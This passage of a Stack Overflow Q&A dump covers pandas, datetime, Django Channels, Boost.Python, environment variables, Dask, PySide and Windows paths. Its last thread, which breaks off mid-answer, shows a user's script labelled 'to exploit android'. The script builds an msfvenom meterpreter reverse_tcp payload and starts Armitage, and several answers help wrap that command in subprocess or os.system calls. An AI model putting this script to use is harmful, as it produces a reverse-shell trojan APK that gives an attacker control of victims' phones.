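
df = pd.DataFrame({'Sr.No': [1, 2, 3, 4, 5],
                   'Query': ['a', 'a', 'b', 'b', 'a']})
# map each query onto its total count; every row keeps its frequency
df['Frequency'] = df['Query'].map(df['Query'].value_counts())
print(df['Frequency'].tolist())  # [3, 3, 2, 2, 3]
```

<p><code>groupby(...).transform('size')</code> and this <code>map</code> give the same result; the groupby form generalises better to other aggregations.</p>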
| 1 | 2016-08-03T11:13:27Z | [
"python",
"pandas",
"dataframe"
] |
How to convert data of type Panda to Panda.Dataframe? | 38,741,952 | <p>I have an object whose type is Pandas, and print(object) gives the output below:</p>
<pre><code> print(type(recomen_total))
print(recomen_total)
</code></pre>
<p>Output is </p>
<pre><code><class 'pandas.core.frame.Pandas'>
Pandas(Index=12, instrument_1='XXXXXX', instrument_2='XXXX', trade_strategy='XXX', earliest_timestamp='2016-08-02T10:00:00+0530', latest_timestamp='2016-08-02T10:00:00+0530', xy_signal_count=1)
</code></pre>
<p>I want to convert this object to a pd.DataFrame. How can I do that?</p>
<p>I tried pd.DataFrame(object) and from_dict as well; both throw errors.</p>
| 0 | 2016-08-03T11:12:35Z | 38,742,968 | <p>Interestingly, it will not convert to a DataFrame directly, but to a Series. Once it is converted to a Series, use the <code>to_frame</code> method of Series to convert it to a DataFrame.</p>
<pre><code>import pandas as pd
df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
for row in df.itertuples():
print(pd.Series(row).to_frame())
</code></pre>
<p>Hope this helps!!</p>
<h1>EDIT</h1>
<p>In case you want to save the column names use the _asdict() method like this:</p>
<pre><code>import pandas as pd
df = pd.DataFrame({'col1': [1, 2], 'col2': [0.1, 0.2]},
index=['a', 'b'])
for row in df.itertuples():
d = dict(row._asdict())
print(pd.Series(d).to_frame())
Output:
0
Index a
col1 1
col2 0.1
0
Index b
col1 2
col2 0.2
</code></pre>
| 0 | 2016-08-03T11:57:17Z | [
"python",
"pandas",
"dataframe"
] |
Update date in Python | 38,742,028 | <p>So here is my problem: I am trying to write a little program that gives the user the next date on which he will have to pay rent.</p>
<p>Here is my code:</p>
<pre><code>import datetime

curdate = datetime.date(2015, 01, 01)
rent_date = datetime.date(curdate.year, curdate.month+1, 01)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
rd.replace(cd.year+1, 01, 01)
else:
rd.replace(cd.year, cd.month+1, 01)
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
time_pass(rent_date, curdate, prodcomp, prodcomps)
rent_date_calc(curdate, rent_date)
print "Rent date: " + str(rent_date)
</code></pre>
<p>The problem I have is that rent_date always stays the same (2015-02-01).
Any idea why?</p>
| 1 | 2016-08-03T11:16:07Z | 38,742,144 | <p>Your code is not altering anything because datetime is an immutable object, and when you call replace on it, it returns a new datetime, instead of modifying the first one.</p>
<p>You should <code>return</code> the new object from the function and <code>assign</code> it back to <code>rent_date</code>:</p>
<pre><code>def rent_date_calc(cd, rd):
if cd.month == 12:
return rd.replace(cd.year+1, 01, 01)
else:
return rd.replace(cd.year, cd.month+1, 01)
...
rent_date = rent_date_calc(curdate, rent_date)
</code></pre>
| 1 | 2016-08-03T11:21:34Z | [
"python"
] |
Update date in Python | 38,742,028 | <p>So here is my problem: I am trying to write a little program that gives the user the next date on which he will have to pay rent.</p>
<p>Here is my code:</p>
<pre><code>import datetime

curdate = datetime.date(2015, 01, 01)
rent_date = datetime.date(curdate.year, curdate.month+1, 01)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
rd.replace(cd.year+1, 01, 01)
else:
rd.replace(cd.year, cd.month+1, 01)
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
time_pass(rent_date, curdate, prodcomp, prodcomps)
rent_date_calc(curdate, rent_date)
print "Rent date: " + str(rent_date)
</code></pre>
<p>The problem I have is that rent_date always stays the same (2015-02-01).
Any idea why?</p>
| 1 | 2016-08-03T11:16:07Z | 38,742,424 | <p><strong>Your functions have to return a new rent date.</strong> You just need to add the following lines in your code:</p>
<ul>
<li><strong><em>return cd</em></strong></li>
<li><strong><em>new_rent_date = rent_date_calc(curdate, rent_date)</em></strong></li>
</ul>
<p>====================================================================</p>
<pre><code>curdate = datetime.date(2015, 1, 1)
rent_date = datetime.date(curdate.year, curdate.month+1, 1)
one_day = datetime.timedelta(days = 1)
one_week = datetime.timedelta(weeks = 1)
one_month = datetime.timedelta(weeks = 4)
def rent_date_calc(cd, rd):
if cd.month == 12:
new_date = rd.replace(cd.year+1, 1, 1)
else:
new_date = rd.replace(cd.year, cd.month+1, 1)
return new_date
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
# Not sure what this function should return...
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
# time_pass(rent_date, curdate, prodcomp, prodcomps)
new_rent_date = rent_date_calc(curdate, rent_date)
print "Rent date: " + str(new_rent_date)
</code></pre>
| 0 | 2016-08-03T11:34:43Z | [
"python"
] |
Django channels: Echo example issues | 38,742,115 | <p>I'm following the sample code provided by the <a href="http://channels.readthedocs.io/en/latest/getting-started.html" rel="nofollow">channels documentation</a> and have run into a issue. The django server successfully accepts a websocket from the browser and sending appears to work. However server-side processing of the message (ws_message) does not appear to occur, and no reply (nor any alert) is registered browser-side.</p>
<p><a href="http://i.imgur.com/oVbYm6G.png" rel="nofollow">Sending seems to work, but no reply</a></p>
<p>This behavior is highly similar to that observed in <a href="http://stackoverflow.com/questions/38237120/solved-django-channels-echo-example-not-working">[SOLVED]: Django channels - Echo example not working</a>. However while switching to twisted 16.2.0 was the solution to that case, I am already on twisted 16.2.0.</p>
<p>Code snippets are as follows:</p>
<p><em>consumers.py</em></p>
<pre><code>from django.http import HttpResponse
from channels.handler import AsgiHandler
def ws_message(message):
print("sending message ", message.content["text"])
raise
message.reply_channel.send({
"text": message.content["text"]
})
</code></pre>
<p><em>routing.py</em></p>
<pre><code>from channels.routing import route
from channel_test.consumers import ws_message
channel_routing = [
route("websocket.recieve", ws_message),
]
</code></pre>
<p><em>settings.py</em></p>
<pre><code>INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"channels",
"channel_test",
"argent_display"
]
CHANNEL_LAYERS = {
"default":{
"BACKEND": "asgiref.inmemory.ChannelLayer",
"ROUTING": "argent_display.routing.channel_routing"
}
}
</code></pre>
<p>The django dev server is then run (manage.py runserver) and the following executed via the browser console:</p>
<pre><code>socket = new WebSocket("ws://" + window.location.host + "/chat/");
socket.onmessage = function(e) {
console.log('test');
alert(e.data);
}
socket.onopen = function() {
socket.send("hello world");
}
</code></pre>
<p>Upon receiving a message, an alert should be given and the console logged to. However, neither occurs.</p>
| 0 | 2016-08-03T11:20:26Z | 38,742,358 | <p>You should connect <code>ws_message</code> consumer to <code>websocket.receive</code> not <code>websocket.recieve</code>.</p>
| 0 | 2016-08-03T11:31:33Z | [
"javascript",
"python",
"django",
"websocket",
"django-channels"
] |
boost.python string management | 38,742,186 | <p>How does boost.python handle std::string member variables?
Specifically, if I have a class and its boost.python wrapper</p>
<pre><code>class A {
public:
std::string name;
};
class_<A>("AWrapper")
.def_readwrite("name", &A::name);
</code></pre>
<p>how is the correspondence between std::string object and PyObject it(string) representing is handled:
is boost::python::object(i.e. PyObject) created which stores pointer to the string, thus this object servers as a proxy?
Thus, each time I want to retrieve string member's value, PyString object is created?
Can interning mechanism be applied to such string objects?</p>
| 0 | 2016-08-03T11:23:33Z | 38,745,570 | <p>Short answer: your suspicions and insight about the behaviour are mostly correct; boost-python will interpret your configuration to produce a simple and inefficient behaviour, but it provides support mechanisms to override and extend this. This may be a lot of work.</p>
<p>Long answer:</p>
<blockquote>
<p>is boost::python::object(i.e. PyObject) created which stores pointer to the string, thus this object servers as a proxy?</p>
</blockquote>
<p>No.</p>
<p>Python-strings are immutable and by default (with your configuration) boost-python will convert the std::string into a new python string (str). So there is no proxying going on.</p>
<blockquote>
<p>Thus, each time I want to retrieve string member's value, PyString object is created?</p>
</blockquote>
<p>Yes. The following assertion will fail, where I attempt to verify that the python references to the strings have the same python object id.</p>
<pre><code>input = 'some value'
sut = AWrapper()
sut.name = input
assert id(sut.name) == id(input)
</code></pre>
<blockquote>
<p>Can interning mechanism be applied to such string objects?</p>
</blockquote>
<p>For example, can you enable caching of the created Python string object for a given C++ string, so that a previously created Python string object is returned when available? The answer is also yes, it is possible. The boost-python concepts are <a href="http://www.boost.org/doc/libs/1_61_0/libs/python/doc/html/tutorial/tutorial/functions.html#tutorial.functions.call_policies.call_policies" rel="nofollow" title="call policies">call policies</a> or <a href="http://www.boost.org/doc/libs/1_61_0/libs/python/doc/html/reference/to_from_python_type_conversion.html" rel="nofollow" title="custom converters">custom converters</a>. (Neither is part of the boost-python tutorial.)</p>
<p>You would either extend every <code>def_readwrite</code> call with an appropriate call policy, or overwrite the general built-in converter for <code>std::string</code> to/from <code>PyString</code>, to introduce this theoretical cache.</p>
<p>Keep in mind, python strings are immutable and std::string is mutable. So you will have issues when the member is changed from the C++ side. Additionally, such hooks will also cost performance at runtime when the code handles every single get and set operation.</p>
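For comparison, this is what interning looks like on the pure-Python side via sys.intern (a Python 3 sketch; in Python 2 it is the intern builtin). A custom converter would have to implement an analogous cache in C++:

```python
import sys

a = "".join(["boost", " ", "python"])
b = "".join(["boost", " ", "python"])
print(a == b, a is b)        # equal values, but two distinct objects

ia = sys.intern(a)
ib = sys.intern(b)
print(ia is ib)              # True: interning returns the cached object
```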
| 2 | 2016-08-03T13:50:38Z | [
"python",
"boost",
"boost-python"
] |
linux Environment vars permanently added using python | 38,742,207 | <p>I am trying to update a linux environment variable using a bash script, loaded from a python script</p>
<p>1.- I delete it:</p>
<pre><code>del os.environ['USER']
</code></pre>
<p>2.- I source and run the bash script with the commands lib:</p>
<pre><code>status, output = commands.getstatusoutput('. ' + PATH +'/script.sh')
</code></pre>
<p>2.1.- status = 0; output = 'Environment var updated'</p>
<p>So.. until here, everything seems to works ok</p>
<p>3.- But when I try to test that the var is already updated:</p>
<pre><code>print os.environ['USER']
</code></pre>
<p>I get the following output:</p>
<pre><code>KeyError: 'USER'
</code></pre>
| 0 | 2016-08-03T11:24:50Z | 38,742,414 | <p>The environment is inherited by a child process from its parent; more specifically a parent process creates an environment for child processes and by default this is the same as the parent's.</p>
<p>It is not possible for any process to modify the environment of any other existing process.</p>
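A small demonstration of this inheritance (assumes a POSIX shell): the child can change its copy of a variable, but the parent never sees the change:

```python
import os
import subprocess

os.environ["DEMO_VAR"] = "parent-value"

# The child process gets a copy of our environment and may change it freely
subprocess.call('DEMO_VAR="child-value"; echo "child sees $DEMO_VAR"', shell=True)

# The parent's environment is unchanged
print(os.environ["DEMO_VAR"])   # parent-value
```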
| 1 | 2016-08-03T11:34:21Z | [
"python",
"linux",
"environment-variables"
] |
linux Environment vars permanently added using python | 38,742,207 | <p>I am trying to update a linux environment variable using a bash script, loaded from a python script</p>
<p>1.- I delete it:</p>
<pre><code>del os.environ['USER']
</code></pre>
<p>2.- I source and run the bash script with the commands lib:</p>
<pre><code>status, output = commands.getstatusoutput('. ' + PATH +'/script.sh')
</code></pre>
<p>2.1.- status = 0; output = 'Environment var updated'</p>
<p>So.. until here, everything seems to works ok</p>
<p>3.- But when I try to test that the var is already updated:</p>
<pre><code>print os.environ['USER']
</code></pre>
<p>I get the following output:</p>
<pre><code>KeyError: 'USER'
</code></pre>
| 0 | 2016-08-03T11:24:50Z | 38,742,514 | <p><code>os.environ</code> is <em>not</em> your environment, but a representation of it, created when the <code>os</code> module is imported for the first time. According to <a href="https://docs.python.org/2/library/os.html#process-parameters" rel="nofollow">the documentation</a> some platforms will reflect changes to <code>os.environ</code> in the process's environment. Since you run a subprocess to change the environment, those changes are made to the <em>subprocess</em>, not to the process in which your Python code runs.</p>
<p>There is no way to have changes to a process's environment reflected in its parent process's environment.</p>
| 1 | 2016-08-03T11:38:43Z | [
"python",
"linux",
"environment-variables"
] |
MySQL sequential read in a For Loop | 38,742,229 | <p>I have a database with multiple tables (around 100) with records stored by category. Each category is a table, and each table holds multiple items. Each item has multiple transaction records, one row with multiple fields for every transaction that happens each day.</p>
<p>I need to fetch the records for each item based on a condition, and do some operations(ex: aggregation of some sort) in the app(a PHP or Python program). The results are stored again in another database table.</p>
<p>At present I am running the operations manually for each item, executing the program once per item and passing the item as a parameter. But I am up against the situation where I am getting new categories and new items every day, which makes the manual execution very difficult to keep up with.</p>
<p>Below are the ways in which I have tried to automate, but none of them are working.</p>
<ol>
<li><p>Run the MySQL queries in a for loop for each item, but the execution does not work, or executes for only one item.
This is the controller I used to pull data for each item, but it does not request all items; it only works for either the first item or the last one.
Also I cannot make the loop wait until the database pull is finished.</p>
</li>
</ol>
<p><code>for($i=0;$i<$total_items;$i++)
{
$data['results'] = $this->scripts_model-> run_daily_stats($item, $Parameter1, $Paramet2);
//Use the Results in some operations, and then proceed with next result set.
}
</code></p>
<ol start="2">
<li>Create a flat file for each item and pull the records. This has worked to some extent, but pulling the records from a flat file based on a condition seems equally difficult. And re-creating each file is not working. </li>
<li>Put all the items in a batch job by adding new lines execute for every 30 seconds, but takes a lot of time to complete all the items and again I need to update the batch files every day.</li>
</ol>
<p>Here is a sample batch file I am using. It has 320 rows now and runs for around 2 hrs, and I am adding multiple rows each day, so I expect the total execution time to increase. </p>
<pre><code>15 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item1 >/dev/null 2>&1
15 12 * * * sleep 30; wget 127.0.0.1/~home/scripts/update_daily/item2 >/dev/null 2>&1
16 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item3 >/dev/null 2>&1
16 12 * * * sleep 30; wget 127.0.0.1/~home/scripts/update_daily/item4 >/dev/null 2>&1
.
.
55 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item234 >/dev/null 2>&1
.
.
.
</code></pre>
<ol start="4">
<li>Group multiple items and put them in a batch file, but then I was unable to run the program for each item.</li>
</ol>
<p>Is there a way I can automate the execution without breaking the MySQL connection? Please suggest any technology or programming that will help me resolve the issue.</p>
<p>Thanks</p>
<p>Ravi</p>
| -1 | 2016-08-03T11:25:43Z | 38,742,381 | <p>Before even considering this question, I would urge you to re-examine the structure of your database. If you have 100 tables with the same structure (?), each one representing a different category, it would be MUCH simpler to have a single table with an additional <code>category</code> column that you could then use to query the relevant rows.</p>
<p>Since you don't show the code you described it's difficult for anyone to say what you might have been doing wrong, since all we know is that the things you have tried "don't work".</p>
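As an illustration of the single-table design suggested above (sketched with sqlite3 in place of MySQL; the table and column names are made up), one parameterised query then serves every category, so new categories need no schema changes and no new cron entries:

```python
import sqlite3

con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE transactions (category TEXT, item TEXT, amount REAL)")
con.executemany(
    "INSERT INTO transactions VALUES (?, ?, ?)",
    [("cat1", "item1", 10.0), ("cat1", "item1", 2.5), ("cat2", "item2", 7.0)],
)

# One aggregation query per category instead of one table per category
rows = con.execute(
    "SELECT item, SUM(amount) FROM transactions WHERE category = ? GROUP BY item",
    ("cat1",),
).fetchall()
print(rows)   # [('item1', 12.5)]
```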
| 0 | 2016-08-03T11:32:54Z | [
"php",
"python",
"mysql",
"codeigniter"
] |
Howto copy a dask dataframe? | 38,742,536 | <p>Given a pandas <code>df</code> one can copy it before doing anything via:</p>
<pre><code>df.copy()
</code></pre>
<p>How can I do this with a dask dataframe object?</p>
| 1 | 2016-08-03T11:39:36Z | 38,743,372 | <p>Mutation on dask.dataframe objects is rare, so this is rarely necessary. </p>
<p>That being said, you can safely just copy the object</p>
<pre><code>from copy import copy
df2 = copy(df)
</code></pre>
<p>No dask.dataframe operation mutates any of the fields of the dataframe, so this is sufficient.</p>
| 2 | 2016-08-03T12:14:31Z | [
"python",
"dask"
] |
Howto copy a dask dataframe? | 38,742,536 | <p>Given a pandas <code>df</code> one can copy it before doing anything via:</p>
<pre><code>df.copy()
</code></pre>
<p>How can I do this with a dask dataframe object?</p>
| 1 | 2016-08-03T11:39:36Z | 38,743,529 | <p>Write it to a file and read again:</p>
<pre><code>import os
import dask.dataframe as dd
df = <Initial Dask Dataframe to be copied>
file = 'sample.csv'
df.to_csv(file)
df2 = dd.read_csv(file)
os.remove(file)
</code></pre>
| 0 | 2016-08-03T12:21:48Z | [
"python",
"dask"
] |
QTreeView, QTreeWidget, QTableWidget or QTableView for object data? | 38,742,557 | <p>I have a collection of objects and I want to display their data in rows/columns. However I'm not sure which PySide widget to use. There are a few main features I want to implement which I'm assuming may help decide which widget to use. Each row is an object. Which PySide widget should I use, and why?</p>
<p>Features wanted:</p>
<ul>
<li>Multi row selection</li>
<li>Sort by column</li>
<li>Search/filtering</li>
</ul>
<p><a href="http://i.stack.imgur.com/TmwVx.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/TmwVx.jpg" alt="enter image description here"></a></p>
| 0 | 2016-08-03T11:40:27Z | 38,782,197 | <p>Use a tree if the data is hierarchical. Your data is clearly not so it's better to use a table.</p>
<p>The <code>QTableWidget</code> is slightly easier to implement than the <code>QTableView</code> (which also needs a model, typically a <code>QAbstractTableModel</code> subclass, as its backend) but it has fewer capabilities. I use a <code>QTableWidget</code> for simple cases and a <code>QTableView</code> when I need to. Reasons for using a <code>QTableView</code> can be to improve performance for large tables, or to have multiple views looking at the same data. </p>
<p>I think you cannot do searching and filtering with a <code>QTableWidget</code>, so you would have to use a <code>QTableView</code>, typically together with a <code>QSortFilterProxyModel</code>. </p>
| 0 | 2016-08-05T06:05:32Z | [
"python",
"widget",
"pyside"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but this also does not work: "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,780 | <p>The <code>r</code> prefix is used to indicate the you want the string to be evaluated as "raw", keeping backslashes as-is.</p>
<p>Try this:</p>
<pre><code>path = r"D:\final"
nameFile = "Res"
result = path + '\\' + nameFile + 'mat'
</code></pre>
<p>As you can see, I added <code>r</code> before the string expression that contains a non-escaped backslash.</p>
<p>To see the difference, try doing :</p>
<pre><code>print("\\")
print(r"\\")
</code></pre>
<p>(Without the parentheses if you're using Python2)</p>
<p>Also, I recommend using the <code>pathlib</code> module of the standard library to handle paths properly. This will also help a lot if you try to make your code portable:</p>
<pre><code>from pathlib import Path
result = (Path(path) / nameFile).with_suffix('.mat')
</code></pre>
| 0 | 2016-08-03T11:50:07Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but this also does not work: "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,784 | <p>You need use a raw string for the path variable, or escape the backslash:</p>
<pre><code>path = r"D:\final"
</code></pre>
<p>You can see the difference here:</p>
<pre><code>>>> "D:\final"
'D:\x0cinal'
>>> r"D:\final"
'D:\\final'
</code></pre>
<p>In the first case <code>'\f</code>' is the form feed character 0x0c.</p>
<p>Also, use <a href="https://docs.python.org/3/library/os.path.html#os.path.join" rel="nofollow"><code>os.path.join()</code></a> to construct pathnames:</p>
<pre><code>import os.path
path = r"D:\final"
nameFile = "Res.mat"
result = os.path.join(path, nameFile)
>>> result
'D:\\final\\Res.mat'
</code></pre>
<p>Since you explicitly append the string literal <code>.mat</code> to <code>nameFile</code>, why not simply define <code>nameFile</code> with the <code>.mat</code> extension? If this needs to be dynamic, just add it on like this:</p>
<pre><code>extension = '.mat'
result = os.path.join(path, nameFile + extension)
</code></pre>
| 0 | 2016-08-03T11:50:13Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but this also does not work: "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,794 | <blockquote>
<p>How do I get the "r" in front of the name without using " "?</p>
</blockquote>
<p>Just use <code>os.path.join</code>:</p>
<pre><code>import os
path = r"D:\final"
nameFile= "Res.mat"
result = os.path.join(path, nameFile)
print(result)
>> D:\final\Res.mat
</code></pre>
| 0 | 2016-08-03T11:50:34Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but this also does not work: "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,827 | <p>My interpreter suggests that you are mistaken in your belief that the second example does not work, because</p>
<pre><code>>>> r"D:\final\Res.mat" == "D:\\final\\Res.mat"
True
</code></pre>
<p>The correct way to build file paths from components is by using the <code>os.path.join</code> function, which can take multiple arguments and is portable across platforms. I would suggest you try something like</p>
<pre><code>result = os.path.join(path, nameFile+".mat")
</code></pre>
| 2 | 2016-08-03T11:51:59Z | [
"python",
"rawstring"
] |
AffinityPropagation' object has no attribute 'label_' | 38,742,707 | <p>I am using scikit-learn for the affinity propagation algorithm. My input data is a numpy array of size 2303*2303; it is a similarity matrix. I want to calculate the distance of each element in a cluster to its centroid. When I try to print the labels, I am getting the following error:</p>
<p>"AffinityPropagation' object has no attribute 'label_'". Here is the code:</p>
<pre><code> clusterer = AffinityPropagation(affinity = 'precomputed')
af = clusterer.fit(l2)
print af.label_
</code></pre>
<p>I am getting the following error:</p>
<pre><code>AttributeError: 'AffinityPropagation' object has no attribute 'label_'
</code></pre>
<p>Thanks.</p>
| 0 | 2016-08-03T11:47:08Z | 38,742,865 | <p>According to the docs of <a href="http://scikit-learn.org/stable/modules/generated/sklearn.cluster.AffinityPropagation.html" rel="nofollow">AffinityPropagation</a> you have to type </p>
<p><code>print af.labels_</code></p>
| 1 | 2016-08-03T11:53:17Z | [
"python",
"machine-learning",
"scikit-learn"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how I can combine sh and py code in one file and then execute it. What format should I save it in, and what commands should I use to execute it?</p>
<p>Here is an example script I have written; have a look at it and tell me what modifications it needs.</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,853 | <p>You could save a Python file and run the shell script with Python code:</p>
<pre><code>import os
os.system('./script.sh')
</code></pre>
| 1 | 2016-08-03T11:52:51Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how I can combine sh and py code in one file and then execute it. What format should I save it in, and what commands should I use to execute it?</p>
<p>Here is an example script I have written; have a look at it and tell me what modifications it needs.</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,863 | <p>You can execute Unix commands in Python using <code>os.system()</code>, though it is somewhat deprecated in favour of the <code>subprocess</code> module.
For example:</p>
<pre><code>import os
os.system("command")
</code></pre>
<p>or better using <code>subprocess</code> module:</p>
<pre><code>import subprocess
subprocess.call("command1")
subprocess.call(["command1", "arg1", "arg2"])
</code></pre>
<p>In your case it would look like this (note that <code>R></code> in the original command is shell redirection, so the output file must be opened from Python; the filename below is a placeholder):</p>
<pre><code># "R" asks msfvenom for raw output; stdout is redirected to the file
with open("/root/Desktop/payload.apk", "wb") as out:
    subprocess.call(["msfvenom", "-p", "android/meterpreter/reverse_tcp",
                     "LHOST=" + str(lhost), "LPORT=" + str(lport), "R"],
                    stdout=out)
</code></pre>
<p>More info on executing shell commands in python <a href="http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/" rel="nofollow">here</a>.</p>
| 0 | 2016-08-03T11:53:13Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how I can combine sh and py code in one file and then execute it. What format should I save it in, and what commands should I use to execute it?</p>
<p>Here is an example script I have written; have a look at it and tell me what modifications it needs.</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,982 | <p>You can't write both intermixed directly, but you can certainly run shell commands from within Python:</p>
<pre><code>import subprocess
retval = subprocess.call('echo foo', shell=True)
</code></pre>
<p>See the <a href="https://docs.python.org/3/library/subprocess.html" rel="nofollow"><code>subprocess</code> docs</a> for more detail. </p>
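If the Python side needs the command's output back rather than just its exit status, subprocess.check_output captures stdout:

```python
import subprocess

out = subprocess.check_output("echo hello from the shell", shell=True)
print(out.decode().strip())   # hello from the shell
```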
| 1 | 2016-08-03T11:57:57Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how I can combine sh and py code in one file and then execute it. What format should I save it in, and what commands should I use to execute it?</p>
<p>Here is an example script I have written; have a look at it and tell me what modifications it needs.</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,743,080 | <p>You can. You have to import the os module and wrap your shell commands like this: os.system("ls -l"). <a href="http://stackoverflow.com/questions/89228/calling-an-external-command-in-python">Source</a></p>
<p>So for your code it would look like this:</p>
<pre><code>#test
print("hello welcome to test")
import os
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == str(1):
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
